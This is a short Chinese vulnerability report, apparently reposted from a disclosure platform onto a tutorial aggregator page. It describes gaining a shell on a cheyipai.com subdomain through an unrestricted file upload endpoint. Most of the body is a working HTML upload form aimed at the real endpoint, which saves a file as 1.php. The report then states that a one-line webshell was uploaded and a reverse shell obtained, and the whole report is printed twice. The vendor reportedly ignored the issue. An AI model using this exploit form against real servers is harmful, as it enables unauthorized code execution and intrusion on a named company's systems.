Heim >Web-Frontend >HTML-Tutorial >车易拍某站Getshell_html/css_WEB-ITnose
漏洞标题 | 车易拍某站Getshell |
---|---|
相关厂商 | cheyipai.com |
漏洞作者 | 荒废的腰子 |
提交时间 | 2016-03-28 11:03 |
公开时间 | 2016-04-02 11:10 |
漏洞类型 | 文件上传导致任意代码执行 |
危害等级 | 高 |
自评Rank | 15 |
漏洞状态 | 漏洞已经通知厂商但是厂商忽略漏洞 |
Tags标签 | getshell, 任意文件上传 |
存在可以上传文件的地方
http://imo.cheyipai.com/file/NDisk/write.php
<!DOCTYPE html><html> <body> <form action="http://imo.cheyipai.com/file/NDisk/write.php" method="post" enctype ="multipart/form-data"> <input name="name" type="file" /> <input name="filename" type="hidden" value="1.php"/> <input name="cid" type="hidden"value="/"/> <input type="submit" name="Submit" value="Go"/></form> </body></html>
上传一句话木马
成功反弹shell
存在可以上传文件的地方
http://imo.cheyipai.com/file/NDisk/write.php
<!DOCTYPE html><html> <body> <form action="http://imo.cheyipai.com/file/NDisk/write.php" method="post" enctype ="multipart/form-data"> <input name="name" type="file" /> <input name="filename" type="hidden" value="1.php"/> <input name="cid" type="hidden"value="/"/> <input type="submit" name="Submit" value="Go"/></form> </body></html>
上传一句话木马
成功反弹shell
升级
【本文版权归安全脉搏所有,未经许可不得转载。文章仅代表作者看法,如有不同观点,欢迎添加安全脉搏微信号:SecPulse,进行交流。】